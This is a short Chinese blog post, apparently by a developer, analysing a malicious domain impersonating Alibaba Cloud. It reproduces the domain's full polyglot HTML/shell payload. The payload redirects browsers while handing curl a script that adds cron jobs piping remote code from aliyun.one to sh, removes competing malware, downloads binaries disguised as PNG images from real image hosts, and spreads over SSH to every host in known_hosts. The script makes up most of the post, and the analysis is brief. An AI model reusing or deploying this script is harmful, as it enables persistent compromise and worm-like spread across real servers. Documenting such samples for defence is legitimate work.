好久之前的事了, 看了一下放在硬盘里, 得找个地方丢, 准备丢在博客上来。
群里有人问为什么在腾讯主机里看到有阿里云的链接, 难道是商业竞争吗?
我一看 aliyun.one ?
立刻想到是钓鱼网站吗? 阿里云有这域名我怎么不知道? 然后使用 dns 查询工具, 查到所有响应的节点都在境外.
我在国内 dns 怎么是境外? 已经确定是病毒了.
使用浏览器打开这个网址, 发现立刻跳转到了 aliyun.com , 不知道的还以为是真的阿里云.
然后 curl 一下, 发现内容不一样了, 发现里面有 html 和 shell .
html 用来跳转到 aliyun.com , shell 用来在 linux 上运行. 分别使用了不同的注释了避免干扰, 很有意思.
简单看了下, 会进行定时执行, 根据内核执行二进制代码, 还有感染其他主机…
https://www.v2ex.com/amp/t/626230/1
https://blog.csdn.net/xujiamin0022016/article/details/103319879
病毒涉及的文件:
这里仅展示首页文件, 看了一下, 我这个前端搬砖仔感受到了人家的思路新奇, 唯有感叹.
#<script>window.location.href="http://aliyun.com";</script><!--
export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mv /bin/wge /bin/wget
mv /bin/cur /bin/curl
mv /usr/bin/wge /usr/bin/wget
mv /usr/bin/cur /usr/bin/curl
mkdir -p /tmp
chmod 1777 /tmp
echo "*/10 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh"|crontab -
cat > /etc/crontab <<EOF
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
*/10 * * * * root (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())'||/usr/local/sbin/6be3a53abd)|sh
EOF
swapoff -a
find /etc/cron*|xargs chattr -i
find /var/spool/cron*|xargs chattr -i
grep -RE "(wget|curl)" /etc/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
grep -RE "(wget|curl)" /var/spool/cron*|grep -v "aliyun.one"|cut -f 1 -d :|xargs rm -rf
netstat -anp|grep :::6345|awk '{print $7}'|sed -e "s//.*//g"|xargs kill -9
netstat -anp|grep 119.9.76.107:443|awk '{print $7}'|sed -e "s//.*//g"|xargs kill -9
cd /tmp
touch /usr/local/bin/writeablex && cd /usr/local/bin/
touch /usr/libexec/writeablex && cd /usr/libexec/
touch /usr/bin/writeablex && cd /usr/bin/
rm -rf /usr/local/bin/writeablex /usr/libexec/writeablex /usr/bin/writeablex
export PATH=$PATH:$(pwd)
a64="img.sobot.com/chatres/89/msg/20191225/1/ec0991da601e45c4b0bb6178da5f0cc4.png"
a32="img.sobot.com/chatres/89/msg/20191225/1/50659157a100466a88fed550423a38ee.png"
b64="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269944760/2.637890910155951.png"
b32="cdn.xiaoduoai.com/cvd/dist/fileUpload/1577269966297/8.872362655092918.png"
c64="https://user-images.githubusercontent.com/56861392/71443284-08acf200-2745-11ea-8ef3-509d9072d970.png"
c32="https://user-images.githubusercontent.com/56861392/71443285-08acf200-2745-11ea-96c3-0c2be9135085.png"
if [ ! -f "6be3a53abd" ]; then
ARCH=$(getconf LONG_BIT)
if [ ${ARCH}x = "64x" ]; then
(curl -fsSL -m180 $a64 -o 6be3a53abd||wget -T180 -q $a64 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$a64'", "6be3a53abd")'||curl -fsSL -m180 $b64 -o 6be3a53abd||wget -T180 -q $b64 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$b64'", "6be3a53abd")'||curl -fsSL -m180 $c64 -o 6be3a53abd||wget -T180 -q $c64 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("'$c64'", "6be3a53abd")')
else
(curl -fsSL -m180 $a32 -o 6be3a53abd||wget -T180 -q $a32 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$a32'", "6be3a53abd")'||curl -fsSL -m180 $b32 -o 6be3a53abd||wget -T180 -q $b32 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("http://'$b32'", "6be3a53abd")'||curl -fsSL -m180 $c32 -o 6be3a53abd||wget -T180 -q $c32 -O 6be3a53abd||python -c 'import urllib;urllib.urlretrieve("'$c32'", "6be3a53abd")')
fi
fi
chmod +x 6be3a53abd
$(pwd)/6be3a53abd || ./6be3a53abd || /usr/bin/6be3a53abd || /usr/libexec/6be3a53abd || /usr/local/bin/6be3a53abd || 6be3a53abd || /tmp/6be3a53abd || /usr/local/sbin/6be3a53abd
if [ -f /root/.ssh/known_hosts ]; then
for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh >/dev/null 2>&1 &";done
fi
for file in /home/*
do
if test -d $file; then
if [ -f $file/.ssh/known_hosts ]; then
for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "(curl -fsSL aliyun.one||wget -q -O- aliyun.one||python -c 'import urllib;print(urllib.urlopen("http://aliyun.one").read())')|sh >/dev/null 2>&1 &";done
fi
fi
done
#-->
所有关联的文件: aliyun.one.zip
就不直接贴出来了。